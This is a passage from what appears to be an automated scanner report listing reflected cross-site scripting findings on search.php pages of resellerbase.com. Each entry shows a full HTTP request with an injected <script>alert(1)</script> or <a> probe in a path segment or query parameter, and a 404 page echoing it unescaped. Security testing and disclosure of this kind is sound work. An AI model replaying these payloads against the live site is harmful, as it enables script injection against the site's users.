<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2b1982<a>1b56b5dc871 was not found on this server.</p>
...[SNIP]...

2.279. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b7bde<script>alert(1)</script>2a2f4ef5169 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultb7bde<script>alert(1)</script>2a2f4ef5169/personals-dating/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultb7bde<script>alert(1)</script>2a2f4ef5169/personals-dating/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.280. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fe01d<script>alert(1)</script>deba8336341 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-datingfe01d<script>alert(1)</script>deba8336341/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-datingfe01d<script>alert(1)</script>deba8336341/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.281. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 70fa6<script>alert(1)</script>07ca63c3e19 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes70fa6<script>alert(1)</script>07ca63c3e19/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes70fa6<script>alert(1)</script>07ca63c3e19/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.282. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 251d8<script>alert(1)</script>7a3394b2bfa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos251d8<script>alert(1)</script>7a3394b2bfa/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos251d8<script>alert(1)</script>7a3394b2bfa/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.283. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c11e8<script>alert(1)</script>83134e48169 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/imagesc11e8<script>alert(1)</script>83134e48169/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/imagesc11e8<script>alert(1)</script>83134e48169/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.284. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 92b5d<script>alert(1)</script>a21e752ed40 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/search.php92b5d<script>alert(1)</script>a21e752ed40?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/search.php92b5d<script>alert(1)</script>a21e752ed40?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.285. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload f3964<a>e4494b9a37f was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchf3964<a>e4494b9a37f&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchf3964<a>e4494b9a37f&opt=2 was not found on this server.</p>
...[SNIP]...

2.286. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2b56c<a>65120a4dae was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/images/search.php?keyword=search...2b56c<a>65120a4dae&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/search.php?keyword=search...2b56c<a>65120a4dae&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.287. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c7a9c<script>alert(1)</script>63816aeb1cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&c7a9c<script>alert(1)</script>63816aeb1cb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&c7a9c<script>alert(1)</script>63816aeb1cb=1 was not found on this server.</p>
...[SNIP]...

2.288. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b9f3e<a>c64c1bc135b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2b9f3e<a>c64c1bc135b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2b9f3e<a>c64c1bc135b was not found on this server.</p>
...[SNIP]...

2.289. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 81a27<script>alert(1)</script>3ac780cc3e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult81a27<script>alert(1)</script>3ac780cc3e2/personals-dating/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult81a27<script>alert(1)</script>3ac780cc3e2/personals-dating/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.290. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9821<script>alert(1)</script>7343903db41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-datingf9821<script>alert(1)</script>7343903db41/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-datingf9821<script>alert(1)</script>7343903db41/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.291. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 65c60<script>alert(1)</script>e876b8ee22c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes65c60<script>alert(1)</script>e876b8ee22c/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes65c60<script>alert(1)</script>e876b8ee22c/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.292. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b7a51<script>alert(1)</script>f62df4da823 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmosb7a51<script>alert(1)</script>f62df4da823/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmosb7a51<script>alert(1)</script>f62df4da823/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.293. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 75234<script>alert(1)</script>e8836e38aca was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/search.php75234<script>alert(1)</script>e8836e38aca?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/search.php75234<script>alert(1)</script>e8836e38aca?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.294. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 63954<a>d0776f12aec was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/search.php?keyword=search...&Submit3=Search63954<a>d0776f12aec&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/search.php?keyword=search...&Submit3=Search63954<a>d0776f12aec&opt=2 was not found on this server.</p>
...[SNIP]...

2.295. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1a1ff<a>700f98bb490 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/search.php?keyword=search...1a1ff<a>700f98bb490&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/search.php?keyword=search...1a1ff<a>700f98bb490&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.296. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ee202<script>alert(1)</script>b3390fc92dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

